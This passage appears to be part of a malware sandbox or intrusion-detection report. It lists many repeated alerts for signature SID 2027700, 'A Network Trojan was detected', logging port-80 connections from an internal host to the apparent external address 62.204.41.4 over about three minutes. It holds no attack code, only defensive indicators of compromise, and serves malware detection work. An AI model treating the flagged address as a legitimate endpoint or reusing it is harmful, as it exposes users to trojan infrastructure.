                            SID:2027700
                            Source Port:50250
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449717802027700 02/08/23-17:37:29.811373
                            SID:2027700
                            Source Port:49717
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449815802027700 02/08/23-17:37:58.137635
                            SID:2027700
                            Source Port:49815
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450238802027700 02/08/23-17:39:56.593363
                            SID:2027700
                            Source Port:50238
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450149802027700 02/08/23-17:39:32.825800
                            SID:2027700
                            Source Port:50149
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450247802027700 02/08/23-17:39:58.822362
                            SID:2027700
                            Source Port:50247
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450336802027700 02/08/23-17:40:22.842207
                            SID:2027700
                            Source Port:50336
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449816802027700 02/08/23-17:37:58.374846
                            SID:2027700
                            Source Port:49816
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450078802027700 02/08/23-17:39:15.231604
                            SID:2027700
                            Source Port:50078
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450311802027700 02/08/23-17:40:15.296990
                            SID:2027700
                            Source Port:50311
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449905802027700 02/08/23-17:38:26.197219
                            SID:2027700
                            Source Port:49905
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449946802027700 02/08/23-17:38:37.915361
                            SID:2027700
                            Source Port:49946
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449857802027700 02/08/23-17:38:13.235521
                            SID:2027700
                            Source Port:49857
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449983802027700 02/08/23-17:38:50.645662
                            SID:2027700
                            Source Port:49983
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450168802027700 02/08/23-17:39:37.476154
                            SID:2027700
                            Source Port:50168
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449745802027700 02/08/23-17:37:39.033150
                            SID:2027700
                            Source Port:49745
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450222802027700 02/08/23-17:39:52.771625
                            SID:2027700
                            Source Port:50222
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449999802027700 02/08/23-17:38:56.038686
                            SID:2027700
                            Source Port:49999
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450009802027700 02/08/23-17:38:58.446402
                            SID:2027700
                            Source Port:50009
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450275802027700 02/08/23-17:40:05.702720
                            SID:2027700
                            Source Port:50275
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450317802027700 02/08/23-17:40:18.173072
                            SID:2027700
                            Source Port:50317
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450079802027700 02/08/23-17:39:15.474751
                            SID:2027700
                            Source Port:50079
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450151802027700 02/08/23-17:39:33.307816
                            SID:2027700
                            Source Port:50151
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450110802027700 02/08/23-17:39:23.028270
                            SID:2027700
                            Source Port:50110
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450021802027700 02/08/23-17:39:01.371725
                            SID:2027700
                            Source Port:50021
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449927802027700 02/08/23-17:38:32.329981
                            SID:2027700
                            Source Port:49927
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450062802027700 02/08/23-17:39:11.394661
                            SID:2027700
                            Source Port:50062
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449933802027700 02/08/23-17:38:34.763685
                            SID:2027700
                            Source Port:49933
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449872802027700 02/08/23-17:38:18.196909
                            SID:2027700
                            Source Port:49872
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449942802027700 02/08/23-17:38:36.933202
                            SID:2027700
                            Source Port:49942
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449774802027700 02/08/23-17:37:45.979162
                            SID:2027700
                            Source Port:49774
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449844802027700 02/08/23-17:38:08.504141
                            SID:2027700
                            Source Port:49844
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450025802027700 02/08/23-17:39:02.337619
                            SID:2027700
                            Source Port:50025
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449863802027700 02/08/23-17:38:16.006053
                            SID:2027700
                            Source Port:49863
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449961802027700 02/08/23-17:38:41.634574
                            SID:2027700
                            Source Port:49961
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449758802027700 02/08/23-17:37:42.136397
                            SID:2027700
                            Source Port:49758
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450034802027700 02/08/23-17:39:04.545459
                            SID:2027700
                            Source Port:50034
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450196802027700 02/08/23-17:39:46.473903
                            SID:2027700
                            Source Port:50196
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450040802027700 02/08/23-17:39:05.994783
                            SID:2027700
                            Source Port:50040
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450081802027700 02/08/23-17:39:15.969624
                            SID:2027700
                            Source Port:50081
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450288802027700 02/08/23-17:40:08.838915
                            SID:2027700
                            Source Port:50288
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450294802027700 02/08/23-17:40:10.272901
                            SID:2027700
                            Source Port:50294
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450123802027700 02/08/23-17:39:26.512749
                            SID:2027700
                            Source Port:50123
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450279802027700 02/08/23-17:40:06.686450
                            SID:2027700
                            Source Port:50279
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450108802027700 02/08/23-17:39:22.559760
                            SID:2027700
                            Source Port:50108
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450206802027700 02/08/23-17:39:48.861882
                            SID:2027700
                            Source Port:50206
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450308802027700 02/08/23-17:40:13.941053
                            SID:2027700
                            Source Port:50308
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450291802027700 02/08/23-17:40:09.560444
                            SID:2027700
                            Source Port:50291
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449891802027700 02/08/23-17:38:22.836955
                            SID:2027700
                            Source Port:49891
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449761802027700 02/08/23-17:37:42.845742
                            SID:2027700
                            Source Port:49761
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449831802027700 02/08/23-17:38:01.970314
                            SID:2027700
                            Source Port:49831
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449701802027700 02/08/23-17:37:25.852741
                            SID:2027700
                            Source Port:49701
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449885802027700 02/08/23-17:38:21.385215
                            SID:2027700
                            Source Port:49885
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449914802027700 02/08/23-17:38:28.388086
                            SID:2027700
                            Source Port:49914
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449955802027700 02/08/23-17:38:40.070472
                            SID:2027700
                            Source Port:49955
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449996802027700 02/08/23-17:38:55.320994
                            SID:2027700
                            Source Port:49996
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450266802027700 02/08/23-17:40:03.436704
                            SID:2027700
                            Source Port:50266
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449720802027700 02/08/23-17:37:30.557563
                            SID:2027700
                            Source Port:49720
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450320802027700 02/08/23-17:40:18.911019
                            SID:2027700
                            Source Port:50320
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450225802027700 02/08/23-17:39:53.481402
                            SID:2027700
                            Source Port:50225
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450219802027700 02/08/23-17:39:52.017413
                            SID:2027700
                            Source Port:50219
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450006802027700 02/08/23-17:38:57.717411
                            SID:2027700
                            Source Port:50006
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450012802027700 02/08/23-17:38:59.182172
                            SID:2027700
                            Source Port:50012
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450053802027700 02/08/23-17:39:09.121134
                            SID:2027700
                            Source Port:50053
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450177802027700 02/08/23-17:39:40.085027
                            SID:2027700
                            Source Port:50177
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450136802027700 02/08/23-17:39:29.705547
                            SID:2027700
                            Source Port:50136
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450281802027700 02/08/23-17:40:07.173251
                            SID:2027700
                            Source Port:50281
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450024802027700 02/08/23-17:39:02.100310
                            SID:2027700
                            Source Port:50024
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450137802027700 02/08/23-17:39:29.950707
                            SID:2027700
                            Source Port:50137
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450220802027700 02/08/23-17:39:52.269838
                            SID:2027700
                            Source Port:50220
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449714802027700 02/08/23-17:37:29.062382
                            SID:2027700
                            Source Port:49714
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450042802027700 02/08/23-17:39:06.484997
                            SID:2027700
                            Source Port:50042
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450119802027700 02/08/23-17:39:25.527748
                            SID:2027700
                            Source Port:50119
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449840802027700 02/08/23-17:38:07.481729
                            SID:2027700
                            Source Port:49840
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450198802027700 02/08/23-17:39:46.952790
                            SID:2027700
                            Source Port:50198
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450315802027700 02/08/23-17:40:17.704525
                            SID:2027700
                            Source Port:50315
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449812802027700 02/08/23-17:37:57.432480
                            SID:2027700
                            Source Port:49812
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449729802027700 02/08/23-17:37:35.078277
                            SID:2027700
                            Source Port:49729
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450155802027700 02/08/23-17:39:34.245100
                            SID:2027700
                            Source Port:50155
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450070802027700 02/08/23-17:39:13.299293
                            SID:2027700
                            Source Port:50070
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449986802027700 02/08/23-17:38:51.969969
                            SID:2027700
                            Source Port:49986
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450333802027700 02/08/23-17:40:22.114217
                            SID:2027700
                            Source Port:50333
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449981802027700 02/08/23-17:38:49.709877
                            SID:2027700
                            Source Port:49981
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449907802027700 02/08/23-17:38:26.684813
                            SID:2027700
                            Source Port:49907
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449785802027700 02/08/23-17:37:48.607664
                            SID:2027700
                            Source Port:49785
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450253802027700 02/08/23-17:40:00.282450
                            SID:2027700
                            Source Port:50253
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449925802027700 02/08/23-17:38:31.225194
                            SID:2027700
                            Source Port:49925
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450075802027700 02/08/23-17:39:14.493858
                            SID:2027700
                            Source Port:50075
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450014802027700 02/08/23-17:38:59.675888
                            SID:2027700
                            Source Port:50014
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450210802027700 02/08/23-17:39:49.826813
                            SID:2027700
                            Source Port:50210
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449917802027700 02/08/23-17:38:29.103690
                            SID:2027700
                            Source Port:49917
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450109802027700 02/08/23-17:39:22.797984
                            SID:2027700
                            Source Port:50109
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450305802027700 02/08/23-17:40:12.988863
                            SID:2027700
                            Source Port:50305
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449830802027700 02/08/23-17:38:01.731970
                            SID:2027700
                            Source Port:49830
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450193802027700 02/08/23-17:39:45.766476
                            SID:2027700
                            Source Port:50193
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449793802027700 02/08/23-17:37:50.723015
                            SID:2027700
                            Source Port:49793
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450032802027700 02/08/23-17:39:04.057616
                            SID:2027700
                            Source Port:50032
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449898802027700 02/08/23-17:38:24.505533
                            SID:2027700
                            Source Port:49898
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449752802027700 02/08/23-17:37:40.700038
                            SID:2027700
                            Source Port:49752
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449935802027700 02/08/23-17:38:35.242769
                            SID:2027700
                            Source Port:49935
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449739802027700 02/08/23-17:37:37.573322
                            SID:2027700
                            Source Port:49739
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449971802027700 02/08/23-17:38:47.051646
                            SID:2027700
                            Source Port:49971
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449958802027700 02/08/23-17:38:40.811347
                            SID:2027700
                            Source Port:49958
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450080802027700 02/08/23-17:39:15.721319
                            SID:2027700
                            Source Port:50080
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449976802027700 02/08/23-17:38:48.242353
                            SID:2027700
                            Source Port:49976
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450127802027700 02/08/23-17:39:27.463619
                            SID:2027700
                            Source Port:50127
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449775802027700 02/08/23-17:37:46.222862
                            SID:2027700
                            Source Port:49775
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449757802027700 02/08/23-17:37:41.898387
                            SID:2027700
                            Source Port:49757
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449953802027700 02/08/23-17:38:39.587593
                            SID:2027700
                            Source Port:49953
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449795802027700 02/08/23-17:37:51.324909
                            SID:2027700
                            Source Port:49795
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449798802027700 02/08/23-17:37:52.895060
                            SID:2027700
                            Source Port:49798
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449737802027700 02/08/23-17:37:37.044350
                            SID:2027700
                            Source Port:49737
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450157802027700 02/08/23-17:39:34.733706
                            SID:2027700
                            Source Port:50157
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449930802027700 02/08/23-17:38:33.757165
                            SID:2027700
                            Source Port:49930
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450065802027700 02/08/23-17:39:12.112270
                            SID:2027700
                            Source Port:50065
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449973802027700 02/08/23-17:38:47.525350
                            SID:2027700
                            Source Port:49973
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450200802027700 02/08/23-17:39:47.437016
                            SID:2027700
                            Source Port:50200
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449881802027700 02/08/23-17:38:20.412227
                            SID:2027700
                            Source Port:49881
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449829802027700 02/08/23-17:38:01.495962
                            SID:2027700
                            Source Port:49829
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449948802027700 02/08/23-17:38:38.400423
                            SID:2027700
                            Source Port:49948
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450215802027700 02/08/23-17:39:51.044011
                            SID:2027700
                            Source Port:50215
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450129802027700 02/08/23-17:39:27.963603
                            SID:2027700
                            Source Port:50129
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449945802027700 02/08/23-17:38:37.668635
                            SID:2027700
                            Source Port:49945
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450307802027700 02/08/23-17:40:13.620720
                            SID:2027700
                            Source Port:50307
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450022802027700 02/08/23-17:39:01.616779
                            SID:2027700
                            Source Port:50022
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450037802027700 02/08/23-17:39:05.274551
                            SID:2027700
                            Source Port:50037
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450093802027700 02/08/23-17:39:18.875584
                            SID:2027700
                            Source Port:50093
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450178802027700 02/08/23-17:39:40.855898
                            SID:2027700
                            Source Port:50178
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449762802027700 02/08/23-17:37:43.088898
                            SID:2027700
                            Source Port:49762
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449767802027700 02/08/23-17:37:44.322427
                            SID:2027700
                            Source Port:49767
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450230802027700 02/08/23-17:39:54.670214
                            SID:2027700
                            Source Port:50230
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450090802027700 02/08/23-17:39:18.150814
                            SID:2027700
                            Source Port:50090
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449940802027700 02/08/23-17:38:36.464020
                            SID:2027700
                            Source Port:49940
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450302802027700 02/08/23-17:40:12.239778
                            SID:2027700
                            Source Port:50302
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450271802027700 02/08/23-17:40:04.731947
                            SID:2027700
                            Source Port:50271
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449724802027700 02/08/23-17:37:31.965740
                            SID:2027700
                            Source Port:49724
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450052802027700 02/08/23-17:39:08.886987
                            SID:2027700
                            Source Port:50052
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449902802027700 02/08/23-17:38:25.464005
                            SID:2027700
                            Source Port:49902
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450011802027700 02/08/23-17:38:58.917493
                            SID:2027700
                            Source Port:50011
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449943802027700 02/08/23-17:38:37.183501
                            SID:2027700
                            Source Port:49943
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450124802027700 02/08/23-17:39:26.754787
                            SID:2027700
                            Source Port:50124
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449765802027700 02/08/23-17:37:43.792451
                            SID:2027700
                            Source Port:49765
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450060802027700 02/08/23-17:39:10.906200
                            SID:2027700
                            Source Port:50060
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450202802027700 02/08/23-17:39:47.905016
                            SID:2027700
                            Source Port:50202
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449790802027700 02/08/23-17:37:49.827327
                            SID:2027700
                            Source Port:49790
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449802802027700 02/08/23-17:37:55.075474
                            SID:2027700
                            Source Port:49802
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450165802027700 02/08/23-17:39:36.727772
                            SID:2027700
                            Source Port:50165
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449843802027700 02/08/23-17:38:08.255380
                            SID:2027700
                            Source Port:49843
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449915802027700 02/08/23-17:38:28.630926
                            SID:2027700
                            Source Port:49915
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450243802027700 02/08/23-17:39:57.826941
                            SID:2027700
                            Source Port:50243
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450223802027700 02/08/23-17:39:53.012602
                            SID:2027700
                            Source Port:50223
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449861802027700 02/08/23-17:38:15.536359
                            SID:2027700
                            Source Port:49861
                            Destination Port:80
                            Protocol:TCP
